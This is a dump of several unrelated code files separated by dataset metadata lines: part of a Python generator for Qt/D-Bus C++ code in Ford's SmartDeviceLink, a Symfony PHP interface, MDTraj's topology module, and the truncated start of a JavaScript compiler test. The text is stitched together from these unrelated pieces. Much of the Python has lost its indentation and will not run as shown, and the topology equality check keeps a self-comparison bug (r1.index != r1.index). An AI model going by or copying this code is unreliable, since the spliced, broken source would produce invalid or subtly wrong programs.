self.write_param_validation(param_copy, param_name + ".val", fail_statement, out, level+1)
out.write("}\n")
elif param.array:
if param.minSize > 0:
out.write("if ({0}.count() < {1}) {{".format(param_name, param.minSize))
with CodeBlock(out) as out:
out.write("{0};\n".format(fail_statement))
out.write("}\n")
if param.maxSize != None:
out.write("if ({0}.count() > {1}) {{".format(param_name, param.maxSize))
with CodeBlock(out) as out:
out.write("{0};\n".format(fail_statement))
out.write("}\n")
if param.restricted:
out.write('for ({0}::const_iterator it_{2} = {1}.begin(); it_{2} != {1}.end(); ++it_{2}) {{\n'.format(self.qt_param_type(param), param_name, level))
with CodeBlock(out) as out:
param_copy = copy(param)
param_copy.array = False
self.write_param_validation(param_copy, "(*it_{0})".format(level), fail_statement, out, level+1)
out.write("}\n")
elif param.struct:
for p in self.structs[param.fulltype]:
self.write_param_validation(p, "{0}.{1}".format(param_name, p.name), fail_statement, out, level+1)
elif param.type == "Integer" or param.type == "Float":
conditions = []
if (param.minValue != None):
conditions.append("(%s < %s)" % (param_name, param.minValue))
if (param.maxValue != None):
conditions.append("(%s > %s)" % (param_name, param.maxValue))
if conditions:
out.write('if (%s) {' % ' || '.join(conditions))
with CodeBlock(out) as out:
out.write('%s;\n' % fail_statement)
out.write("}\n")
elif param.type == "String":
conditions = []
if (param.minLength > 0):
conditions.append("(%s.size() < %s)" % (param_name, param.minLength))
if (param.maxLength > 0):
conditions.append("(%s.size() > %s)" % (param_name, param.maxLength))
if conditions:
out.write('if (%s) {' % ' || '.join(conditions))
with CodeBlock(out) as out:
out.write('%s;\n' % (fail_statement))
out.write("}\n")
def make_source_file(self, out):
out.write('RequestToSDL::RequestToSDL(QObject *parent) {\n')
with CodeBlock(out) as output:
output.write('QDBusConnection bus = QDBusConnection::sessionBus();\n')
for interface_el in self.el_tree.findall('interface'):
iface_name = interface_el.get('name')
output.write(iface_name + ' = new QDBusInterface("com.ford.sdl.core", "/", "com.ford.sdl.core.' + iface_name + '", bus, this);\n')
out.write('}\n\n')
out.write('RequestToSDL::~RequestToSDL() {\n')
with CodeBlock(out) as output:
for interface_el in self.el_tree.findall('interface'):
iface_name = interface_el.get('name')
output.write(iface_name + '->deleteLater();\n')
output.write('this->deleteLater();\n')
out.write('}\n\n')
impl.make_requests_for_source(out)
arg_parser = ArgumentParser(description="Generator of Qt to QDbus C++ part")
arg_parser.add_argument('--infile', required=True, help="full name of input file, e.g. applink/src/components/interfaces/QT_HMI_API.xml")
arg_parser.add_argument('--version', required=False, help="Qt version 4.8.5 (default) or 5.1.0")
arg_parser.add_argument('--outdir', required=True, help="path to directory where output files request_to_sdl.h, request_to_sdl.cc will be saved")
args = arg_parser.parse_args()
if args.version == "4.8.5":
prefix_class_item = 'Script'
invoke_type_connection = 'Direct'
elif args.version == "5.1.0":
prefix_class_item = 'JS'
invoke_type_connection = 'BlockingQueued'
else:
prefix_class_item = 'JS'
invoke_type_connection = 'BlockingQueued'
header_name = 'request_to_sdl.h'
source_name = 'request_to_sdl.cc'
in_tree = ElementTree.parse(args.infile)
in_tree_root = in_tree.getroot()
impl = Impl(in_tree_root, 'com.ford.sdl.hmi')
header_out = open(args.outdir + '/' + header_name, "w")
source_out = open(args.outdir + '/' + source_name, "w")
header_out.write("// Warning! This file is generated by '%s'. Edit at your own risk.\n" % argv[0])
header_out.write("""
/*
Copyright (c) 2014, Ford Motor Company
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following
disclaimer in the documentation and/or other materials provided with the
distribution.
Neither the name of the Ford Motor Company nor the names of its contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR 'A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
*/
""")
header_out.write("#ifndef SRC_COMPONENTS_QT_HMI_QML_PLUGINS_DBUS_ADAPTER_REQUEST_TO_SDL_H_\n")
header_out.write("#define SRC_COMPONENTS_QT_HMI_QML_PLUGINS_DBUS_ADAPTER_REQUEST_TO_SDL_H_\n\n")
header_out.write("#include <QtCore/QObject>\n")
header_out.write("#include <QtCore/QVariant>\n")
header_out.write("#include <QtCore/QStringList>\n\n")
header_out.write('#include "qml_dbus.h"\n\n')
if args.version == "4.8.5":
header_out.write("#include <QtScript/QScriptValue>\n")
elif args.version == "5.1.0":
header_out.write("#include <QtQml/QJSValue>\n")
impl.make_header_file(header_out)
header_out.write("#endif // SRC_COMPONENTS_QT_HMI_QML_PLUGINS_DBUS_ADAPTER_REQUEST_TO_SDL_H_")
source_out.write("// Warning! This file is generated by '%s'. Edit at your own risk.\n" % argv[0])
source_out.write("""
/*
Copyright (c) 2014, Ford Motor Company
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following
disclaimer in the documentation and/or other materials provided with the
distribution.
Neither the name of the Ford Motor Company nor the names of its contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR 'A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
*/
""")
source_out.write('#include "request_to_sdl.h"\n')
source_out.write("#include <QtDBus/QDBusConnection>\n")
source_out.write("#include <QtDBus/QDBusInterface>\n")
source_out.write('#include "hmi_requests.h"\n')
source_out.write('#include "utils/logger.h"\n\n')
source_out.write('CREATE_LOGGERPTR_GLOBAL(logger_, "DBusPlugin")\n\n')
impl.make_source_file(source_out) | unknown | codeparrot/codeparrot-clean | ||
<?php
/*
* This file is part of the Symfony package.
*
* (c) Fabien Potencier <fabien@symfony.com>
*
* For the full copyright and license information, please view the LICENSE
* file that was distributed with this source code.
*/
namespace Symfony\Component\ExpressionLanguage;
/**
* @author Fabien Potencier <fabien@symfony.com>
*/
interface ExpressionFunctionProviderInterface
{
/**
* @return ExpressionFunction[]
*/
public function getFunctions(): array;
} | php | github | https://github.com/symfony/symfony | src/Symfony/Component/ExpressionLanguage/ExpressionFunctionProviderInterface.php |
##############################################################################
# MDTraj: A Python Library for Loading, Saving, and Manipulating
# Molecular Dynamics Trajectories.
# Copyright 2012-2013 Stanford University and the Authors
#
# Authors: Peter Eastman, Robert McGibbon
# Contributors: Kyle A. Beauchamp
#
# MDTraj is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation, either version 2.1
# of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with MDTraj. If not, see <http://www.gnu.org/licenses/>.
#
# Portions of this code originate from the OpenMM molecular simulation
# toolkit, copyright (c) 2012 Stanford University and Peter Eastman. Those
# portions are distributed under the following terms:
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS, CONTRIBUTORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE
# USE OR OTHER DEALINGS IN THE SOFTWARE.
##############################################################################
##############################################################################
# Imports
##############################################################################
from __future__ import print_function, division
import os
import re
import numpy as np
import itertools
from mdtraj.core import element as elem
import xml.etree.ElementTree as etree
from mdtraj.utils import ilen, import_
##############################################################################
# Utilities
##############################################################################
def _topology_from_subset(topology, atom_indices):
"""Create a new topology that only contains the supplied indices
Note
----
This really should be a copy constructor (class method) on Topology,
but I want it to work on either the mdtraj topology OR the OpenMM
topology. An inplace version for the topology object we have here
is also available.
Parameters
----------
topology : topology
The base topology
atom_indices : list([int])
The indices of the atoms to keep
"""
newTopology = Topology()
old_atom_to_new_atom = {}
for chain in topology._chains:
newChain = newTopology.add_chain()
for residue in chain._residues:
resSeq = getattr(residue, 'resSeq', None) or residue.index
newResidue = newTopology.add_residue(residue.name, newChain, resSeq)
for atom in residue._atoms:
if atom.index in atom_indices:
newAtom = newTopology.add_atom(atom.name, atom.element, newResidue)
old_atom_to_new_atom[atom] = newAtom
bondsiter = topology.bonds
if not hasattr(bondsiter, '__iter__'):
bondsiter = bondsiter()
for atom1, atom2 in bondsiter:
try:
newTopology.add_bond(old_atom_to_new_atom[atom1],
old_atom_to_new_atom[atom2])
except KeyError:
pass
# we only put bonds into the new topology if both of their partners
# were indexed and thus HAVE a new atom
# Delete empty residues
for chain in newTopology._chains:
chain._residues = [r for r in chain._residues if len(r._atoms) > 0]
# Delete empty chains
newTopology._chains = [c for c in newTopology._chains if len(c._residues) > 0]
# Re-set the numAtoms and numResidues
newTopology._numAtoms = ilen(newTopology.atoms)
newTopology._numResidues = ilen(newTopology.residues)
return newTopology
##############################################################################
# Classes
##############################################################################
class Topology(object):
"""Topology stores the topological information about a system.
The structure of a Topology object is similar to that of a PDB file.
It consists of a set of Chains (often but not always corresponding to
polymer chains). Each Chain contains a set of Residues, and each Residue
contains a set of Atoms. In addition, the Topology stores a list of which
atom pairs are bonded to each other.
Atom and residue names should follow the PDB 3.0 nomenclature for all
molecules for which one exists.
Attributes
----------
chains : generator
Iterator over all Chains in the Topology.
residues : genetator
Iterator over all Residues in the Chain.
atoms : generator
Iterator over all Atoms in the Chain.
Examples
--------
>>> topology = md.load('example.pdb').topology
>>> print(topology)
<mdtraj.Topology with 1 chains, 3 residues, 22 atoms, 21 bonds at 0x105a98e90>
>>> table, bonds = topology.to_dataframe()
>>> print(table.head())
serial name element resSeq resName chainID
0 0 H1 H 0 CYS 0
1 1 CH3 C 0 CYS 0
2 2 H2 H 0 CYS 0
3 3 H3 H 0 CYS 0
4 4 C C 0 CYS 0
>>> # rename residue "CYS" to "CYSS"
>>> table[table['residue'] == 'CYS']['residue'] = 'CYSS'
>>> print(table.head())
serial name element resSeq resName chainID
0 0 H1 H 0 CYSS 0
1 1 CH3 C 0 CYSS 0
2 2 H2 H 0 CYSS 0
3 3 H3 H 0 CYSS 0
4 4 C C 0 CYSS 0
>>> t2 = md.Topology.from_dataframe(table, bonds)
"""
_standardBonds = {}
def __init__(self):
"""Create a new Topology object"""
self._chains = []
self._numResidues = 0
self._numAtoms = 0
self._bonds = []
self._atoms = []
self._residues = []
def __ne__(self, other):
return not self.__eq__(other)
def __str__(self):
return "<%s>" % (self._string_summary_basic())
def __repr__(self):
return "<%s at 0x%02x>" % (self._string_summary_basic(), id(self))
def _string_summary_basic(self):
return "mdtraj.Topology with %d chains, %d residues, %d atoms, %d bonds" % (self.n_chains, self.n_residues, self.n_atoms, len(self._bonds))
def copy(self):
"""Return a copy of the topology
Returns
-------
out : Topology
A copy of this topology
"""
out = Topology()
for chain in self.chains:
c = out.add_chain()
for residue in chain.residues:
r = out.add_residue(residue.name, c, residue.resSeq)
for atom in residue.atoms:
out.add_atom(atom.name, atom.element, r)
for a1, a2 in self.bonds:
out.add_bond(a1, a2)
return out
def __copy__(self, *args):
return self.copy()
def __deepcopy__(self, *args):
return self.copy()
def join(self, other):
"""Join two topologies together
Parameters
----------
other : Topology
Another topology object
Returns
-------
out : Topology
A joint topology, with all of the atoms/residues/chains/bonds
in each of the individual topologies
"""
if not isinstance(other, Topology):
raise ValueError('other must be an instance of Topology to join')
out = self.copy()
atom_mapping = {}
for chain in other.chains:
c = out.add_chain()
for residue in chain.residues:
r = out.add_residue(residue.name, c, residue.resSeq)
for atom in residue.atoms:
a = out.add_atom(atom.name, atom.element, r)
atom_mapping[atom] = a
for a1, a2 in other.bonds:
out.add_bond(atom_mapping[a1], atom_mapping[a2])
return out
def to_openmm(self):
"""Convert this topology into OpenMM topology
Returns
-------
topology : simtk.openmm.app.Topology
This topology, as an OpenMM topology
"""
app = import_('simtk.openmm.app')
out = app.Topology()
atom_mapping = {}
for chain in self.chains:
c = out.addChain()
for residue in chain.residues:
r = out.addResidue(residue.name, c)
for atom in residue.atoms:
a = out.addAtom(atom.name, app.Element.getBySymbol(atom.element.symbol), r)
atom_mapping[atom] = a
for a1, a2 in self.bonds:
out.addBond(atom_mapping[a1], atom_mapping[a2])
return out
@classmethod
def from_openmm(cls, value):
"""Create a mdtraj topology from an OpenMM topology
Parameters
----------
value : simtk.openmm.app.Topology
An OpenMM topology that you wish to convert to a
mdtraj topology.
"""
app = import_('simtk.openmm.app')
if not isinstance(value, app.Topology):
raise TypeError('value must be an OpenMM Topology. '
'You supplied a %s' % type(value))
out = cls()
atom_mapping = {}
for chain in value.chains():
c = out.add_chain()
for residue in chain.residues():
r = out.add_residue(residue.name, c)
for atom in residue.atoms():
a = out.add_atom(atom.name, elem.get_by_symbol(atom.element.symbol), r)
atom_mapping[atom] = a
for a1, a2 in value.bonds():
out.add_bond(atom_mapping[a1], atom_mapping[a2])
return out
def to_dataframe(self):
"""Convert this topology into a pandas dataframe
Returns
-------
atoms : pandas.DataFrame
The atoms in the topology, represented as a data frame.
bonds : np.ndarray
The bonds in this topology, represented as an n_bonds x 2 array
of the indices of the atoms involved in each bond.
"""
pd = import_('pandas')
data = []
for atom in self.atoms:
if atom.element is None:
element_symbol = ""
else:
element_symbol = atom.element.symbol
data.append((atom.index, atom.name, element_symbol,
atom.residue.resSeq, atom.residue.name,
atom.residue.chain.index))
atoms = pd.DataFrame(data, columns=["serial", "name", "element",
"resSeq", "resName", "chainID"])
atoms = atoms.set_index("serial")
bonds = np.array([(a.index, b.index) for (a, b) in self.bonds])
return atoms, bonds
@classmethod
def from_dataframe(cls, atoms, bonds=None):
"""Create a mdtraj topology from a pandas data frame
Parameters
----------
atoms : pandas.DataFrame
The atoms in the topology, represented as a data frame. This data
frame should have columns "serial" (atom index), "name" (atom name),
"element" (atom's element), "resSeq" (index of the residue)
"resName" (name of the residue), "chainID" (index of the chain),
following the same conventions as wwPDB 3.0 format.
bonds : np.ndarray, shape=(n_bonds, 2), dtype=int, optional
The bonds in the topology, represented as an n_bonds x 2 array
of the indices of the atoms involved in each bond. Specifiying
bonds here is optional. To create standard protein bonds, you can
use `create_standard_bonds` to "fill in" the bonds on your newly
created Topology object
See Also
--------
create_standard_bonds
"""
pd = import_('pandas')
for col in ["name", "element", "resSeq" , "resName", "chainID"]:
if col not in atoms.columns:
raise ValueError('dataframe must have column %s' % col)
out = cls()
if not isinstance(atoms, pd.DataFrame):
raise TypeError('atoms must be an instance of pandas.DataFrame. '
'You supplied a %s' % type(atoms))
if not isinstance(bonds, np.ndarray):
raise TypeError('bonds must be an instance of numpy.ndarray. '
'You supplied a %s' % type(bonds))
if not np.all(np.arange(len(atoms)) == atoms.index):
raise ValueError('atoms must be uniquely numbered starting from zero.')
out._atoms = [None for i in range(len(atoms))]
for ci in np.unique(atoms['chainID']):
chain_atoms = atoms[atoms['chainID'] == ci]
c = out.add_chain()
for ri in np.unique(chain_atoms['resSeq']):
residue_atoms = chain_atoms[chain_atoms['resSeq'] == ri]
rnames = residue_atoms['resName']
residue_name = np.array(rnames)[0]
if not np.all(rnames == residue_name):
raise ValueError('All of the atoms with residue index %d do not share the same residue name' % ri)
r = out.add_residue(residue_name, c, ri)
for ai, atom in residue_atoms.iterrows():
if atom['element'] == "":
element = None
else:
element = elem.get_by_symbol(atom['element'])
a = Atom(atom['name'], element, ai, r)
out._atoms[ai] = a
r._atoms.append(a)
if bonds is not None:
for ai1, ai2 in bonds:
out.add_bond(out.atom(ai1), out.atom(ai2))
out._numAtoms = out.n_atoms
return out
def __eq__(self, other):
"""Are two topologies equal?
Parameters
----------
other : object
The object to compare to
Returns
-------
equality : bool
Are the two topologies identical?
"""
if not isinstance(other, Topology):
return False
if self is other:
return True
if len(self._chains) != len(other._chains):
return False
for c1, c2 in zip(self.chains, other.chains):
if c1.index != c2.index:
return False
if len(c1._residues) != len(c2._residues):
return False
for r1, r2 in zip(c1.residues, c2.residues):
if (r1.index != r1.index) or (r1.name != r2.name): # or (r1.resSeq != r2.resSeq):
return False
if len(r1._atoms) != len(r2._atoms):
return False
for a1, a2 in zip(r1.atoms, r2.atoms):
if (a1.index != a2.index) or (a1.name != a2.name):
return False
if a1.element is not None and a2.element is not None:
if a1.element != a2.element:
return False
#for attr in ['atomic_number', 'name', 'symbol']:
# if getattr(a1.element, attr) != getattr(a2.element, attr):
# return False
if len(self._bonds) != len(other._bonds):
return False
# the bond ordering is somewhat ambiguous, so try and fix it for comparison
self_sorted_bonds = sorted([(a1.index, b1.index) for (a1, b1) in self.bonds])
other_sorted_bonds = sorted([(a2.index, b2.index) for (a2, b2) in other.bonds])
for i in range(len(self._bonds)):
(a1, b1) = self_sorted_bonds[i]
(a2, b2) = other_sorted_bonds[i]
if (a1 != a2) or (b1 != b2):
return False
return True
def add_chain(self):
"""Create a new Chain and add it to the Topology.
Returns
-------
chain : mdtraj.topology.Chain
the newly created Chain
"""
chain = Chain(len(self._chains), self)
self._chains.append(chain)
return chain
def add_residue(self, name, chain, resSeq=None):
    """Create a new Residue and add it to the Topology.

    Parameters
    ----------
    name : str
        The name of the residue to add
    chain : mdtraj.topology.Chain
        The Chain to add it to
    resSeq : int, optional
        Residue sequence number, such as from a PDB record. These sequence
        numbers are arbitrary, and do not necessarily start at 0 (or 1).
        If not supplied, the resSeq attribute will be set to the
        residue's sequential (0 based) index.

    Returns
    -------
    residue : mdtraj.topology.Residue
        The newly created Residue
    """
    index = self._numResidues
    if resSeq is None:
        # Default the PDB-style sequence number to the sequential index.
        resSeq = index
    new_residue = Residue(name, index, chain, resSeq)
    self._residues.append(new_residue)
    chain._residues.append(new_residue)
    self._numResidues = index + 1
    return new_residue
def add_atom(self, name, element, residue):
    """Create a new Atom and add it to the Topology.

    Parameters
    ----------
    name : str
        The name of the atom to add
    element : mdtraj.element.Element
        The element of the atom to add
    residue : mdtraj.topology.Residue
        The Residue to add it to

    Returns
    -------
    atom : mdtraj.topology.Atom
        the newly created Atom
    """
    index = self._numAtoms
    new_atom = Atom(name, element, index, residue)
    self._atoms.append(new_atom)
    residue._atoms.append(new_atom)
    self._numAtoms = index + 1
    return new_atom
def add_bond(self, atom1, atom2):
    """Create a new bond and add it to the Topology.

    Parameters
    ----------
    atom1 : mdtraj.topology.Atom
        The first Atom connected by the bond
    atom2 : mdtraj.topology.Atom
        The second Atom connected by the bond
    """
    # Store the pair with the lower-index atom first so bond ordering
    # is canonical regardless of the order the caller passed them in.
    first, second = atom1, atom2
    if first.index >= second.index:
        first, second = second, first
    self._bonds.append((first, second))
def chain(self, index):
    """Get a specific chain by index (indices start from zero).

    Returns
    -------
    chain : Chain
        The `index`-th chain in the topology.
    """
    all_chains = self._chains
    return all_chains[index]
@property
def chains(self):
    """Iterator over all Chains in the Topology.

    Returns
    -------
    chainiter : iterator
        Iterator over all Chains in the Topology.
    """
    for ch in self._chains:
        yield ch
@property
def n_chains(self):
    """The number of chains in the Topology."""
    return len(self._chains)
def residue(self, index):
    """Get a specific residue by index (indices start from zero).

    Returns
    -------
    residue : Residue
        The `index`-th residue in the topology.
    """
    all_residues = self._residues
    return all_residues[index]
@property
def residues(self):
    """Iterator over all Residues in the Topology, walking chains in
    order and residues within each chain.

    Returns
    -------
    residueiter : generator
        Iterator over all Residues in the Topology.
    """
    for ch in self._chains:
        for res in ch._residues:
            yield res
@property
def n_residues(self):
    """The number of residues in the Topology."""
    return len(self._residues)
def atom(self, index):
    """Get a specific atom by index (indices start from zero).

    Returns
    -------
    atom : Atom
        The `index`-th atom in the topology.
    """
    all_atoms = self._atoms
    return all_atoms[index]
@property
def atoms(self):
    """Iterator over all Atoms in the Topology, in chain order, then
    residue order within each chain.

    Returns
    -------
    atomiter : generator
        Iterator over all Atoms in the Topology.
    """
    for ch in self._chains:
        for res in ch._residues:
            for at in res._atoms:
                yield at
@property
def n_atoms(self):
    """The number of atoms in the Topology."""
    return len(self._atoms)
@property
def bonds(self):
    """Iterator over all bonds (each represented as a tuple of two Atoms)
    in the Topology.

    Returns
    -------
    atomiter : iterator
        Iterator over all tuples of Atoms involved in a bond.
    """
    for pair in self._bonds:
        yield pair
def create_standard_bonds(self):
    """Create bonds based on the atom and residue names for all standard
    residue types.

    The first call lazily loads the bond templates from
    formats/pdb/data/residues.xml into the class-level cache
    ``Topology._standardBonds``; subsequent calls reuse the cached table.
    """
    if len(Topology._standardBonds) == 0:
        # Load the standard bond definitions (once per process).
        tree = etree.parse(os.path.join(os.path.dirname(__file__), '..', 'formats', 'pdb', 'data', 'residues.xml'))
        for residue in tree.getroot().findall('Residue'):
            bonds = []
            Topology._standardBonds[residue.attrib['name']] = bonds
            for bond in residue.findall('Bond'):
                bonds.append((bond.attrib['from'], bond.attrib['to']))

    for chain in self._chains:
        # First build a map of atom names to atoms, one dict per residue.
        atomMaps = []
        for residue in chain._residues:
            atomMap = {}
            atomMaps.append(atomMap)
            for atom in residue._atoms:
                atomMap[atom.name] = atom

        # Loop over residues and construct bonds. A '-' prefix in the
        # template names the previous residue, '+' the next one.
        for i in range(len(chain._residues)):
            name = chain._residues[i].name
            if name in Topology._standardBonds:
                for bond in Topology._standardBonds[name]:
                    # BUG FIX: the '+' lookahead previously tested
                    # `i < len(chain._residues)`, which is always true and
                    # caused an IndexError into atomMaps on the last
                    # residue; the correct bound is len(...) - 1.
                    if bond[0].startswith('-') and i > 0:
                        fromResidue = i - 1
                        fromAtom = bond[0][1:]
                    elif bond[0].startswith('+') and i < len(chain._residues) - 1:
                        fromResidue = i + 1
                        fromAtom = bond[0][1:]
                    else:
                        fromResidue = i
                        fromAtom = bond[0]
                    if bond[1].startswith('-') and i > 0:
                        toResidue = i - 1
                        toAtom = bond[1][1:]
                    elif bond[1].startswith('+') and i < len(chain._residues) - 1:
                        toResidue = i + 1
                        toAtom = bond[1][1:]
                    else:
                        toResidue = i
                        toAtom = bond[1]
                    if fromAtom in atomMaps[fromResidue] and toAtom in atomMaps[toResidue]:
                        self.add_bond(atomMaps[fromResidue][fromAtom], atomMaps[toResidue][toAtom])
def create_disulfide_bonds(self, positions):
    """Identify disulfide bonds based on proximity and add them to the Topology.

    Parameters
    ----------
    positions : list
        The list of atomic positions based on which to identify bonded atoms
    """
    def isCyx(res):
        # A cysteine with an SG atom but no HG proton is treated as
        # available to form a disulfide bridge.
        names = [atom.name for atom in res._atoms]
        return 'SG' in names and 'HG' not in names

    cyx = [res for res in self.residues if res.name == 'CYS' and isCyx(res)]
    atomNames = [[atom.name for atom in res._atoms] for res in cyx]
    # Compare every unordered pair of candidate SG atoms exactly once
    # (inner loop runs over j < i).
    for i in range(len(cyx)):
        sg1 = cyx[i]._atoms[atomNames[i].index('SG')]
        pos1 = positions[sg1.index]
        for j in range(i):
            sg2 = cyx[j]._atoms[atomNames[j].index('SG')]
            pos2 = positions[sg2.index]
            delta = [x-y for (x,y) in zip(pos1, pos2)]
            distance = np.sqrt(delta[0]*delta[0] + delta[1]*delta[1] + delta[2]*delta[2])
            if distance < 0.3: # this is supposed to be nm. I think we're good
                self.add_bond(sg1, sg2)
def subset(self, atom_indices):
    """Create a new Topology from a subset of the atoms in an existing topology.

    Notes
    -----
    The existing topology will not be altered.

    Parameters
    ----------
    atom_indices : array_like
        A list of the indices corresponding to the atoms in that you'd
        like to retain.
    """
    # Delegates to the module-level helper, which does the actual copying.
    return _topology_from_subset(self, atom_indices)
class Chain(object):
    """A Chain object represents a chain within a Topology.

    Attributes
    ----------
    index : int
        The index of the Chain within its Topology
    topology : mdtraj.Topology
        The Topology this Chain belongs to
    residues : generator
        Iterator over all Residues in the Chain.
    atoms : generator
        Iterator over all Atoms in the Chain.
    """
    def __init__(self, index, topology):
        """Construct a new Chain. You should call add_chain() on the
        Topology instead of calling this directly."""
        ## The index of the Chain within its Topology
        self.index = index
        ## The Topology this Chain belongs to
        self.topology = topology
        self._residues = []

    @property
    def residues(self):
        """Iterator over all Residues in the Chain.

        Returns
        -------
        residueiter : listiterator
            Iterator over all Residues in the Chain.
        """
        return iter(self._residues)

    def residue(self, index):
        """Get a specific residue in this Chain.

        Returns
        -------
        residue : Residue
        """
        # BUG FIX: this previously read self._residue (no such attribute),
        # which raised AttributeError; the list is named self._residues.
        return self._residues[index]

    @property
    def n_residues(self):
        """Get the number of residues in this Chain."""
        return len(self._residues)

    @property
    def atoms(self):
        """Iterator over all Atoms in the Chain.

        Returns
        -------
        atomiter : generator
            Iterator over all Atoms in the Chain.
        """
        for residue in self._residues:
            for atom in residue._atoms:
                yield atom

    def atom(self, index):
        """Get a specific atom in this Chain.

        Returns
        -------
        atom : Atom
        """
        # This could be made faster by caching the list
        # of atoms internally if necessary.
        return next(itertools.islice(self.atoms, index, index + 1))

    @property
    def n_atoms(self):
        """Get the number of atoms in this Chain."""
        return sum(r.n_atoms for r in self._residues)
class Residue(object):
    """A Residue object represents a residue within a Topology.

    Attributes
    ----------
    name : str
        The name of the Residue
    index : int
        The index of the Residue within its Topology
    chain : mdtraj.topology.Chain
        The Chain this Residue belongs to
    resSeq : int
        The residue sequence number (e.g. from a PDB record)
    """
    def __init__(self, name, index, chain, resSeq):
        """Construct a new Residue. You should call add_residue()
        on the Topology instead of calling this directly."""
        self.name = name
        self.index = index
        self.chain = chain
        self.resSeq = resSeq
        self._atoms = []

    @property
    def atoms(self):
        """Iterator over all Atoms in the Residue.

        Returns
        -------
        atomiter : listiterator
            Iterator over all Atoms in the Residue.
        """
        return iter(self._atoms)

    def atom(self, index):
        """Get a specific atom in this Residue.

        Returns
        -------
        atom : Atom
        """
        return self._atoms[index]

    @property
    def n_atoms(self):
        """Get the number of atoms in this Residue."""
        return len(self._atoms)

    def __str__(self):
        # e.g. "ALA12" -- the name followed by the PDB-style sequence
        # number.
        return '%s%s' % (self.name, self.resSeq)
class Atom(object):
    """An Atom object represents an atom within a Topology.

    Attributes
    ----------
    name : str
        The name of the Atom
    element : mdtraj.element.Element
        The element of the Atom
    index : int
        The index of the Atom within its Topology
    residue : mdtraj.topology.Residue
        The Residue this Atom belongs to
    """
    def __init__(self, name, element, index, residue):
        """Construct a new Atom. You should call add_atom() on the
        Topology instead of calling this directly."""
        ## The name of the Atom
        self.name = name
        ## The Atom's element
        self.element = element
        ## The index of the Atom within its Topology
        self.index = index
        ## The Residue this Atom belongs to
        self.residue = residue

    def __eq__(self, other):
        """Check whether two Atom objects are equal."""
        # Comparing against a non-Atom used to raise AttributeError;
        # returning NotImplemented lets Python fall back gracefully.
        if not isinstance(other, Atom):
            return NotImplemented
        if self.name != other.name:
            return False
        if self.index != other.index:
            return False
        if self.element.name != other.element.name:
            return False
        if self.residue.name != other.residue.name:
            return False
        if self.residue.index != other.residue.index:
            return False
        if self.residue.chain.index != other.residue.chain.index:
            return False
        return True

    def __hash__(self):
        """Hash on the topology-wide index: cheap, and consistent with
        __eq__ since equal atoms must share an index."""
        return self.index

    def __str__(self):
        # e.g. "ALA12-CA"
        return '%s-%s' % (self.residue, self.name)
## Input
```javascript
// @enableTreatFunctionDepsAsConditional
function Component(props) {
function getLength() {
return props.bar.length;
}
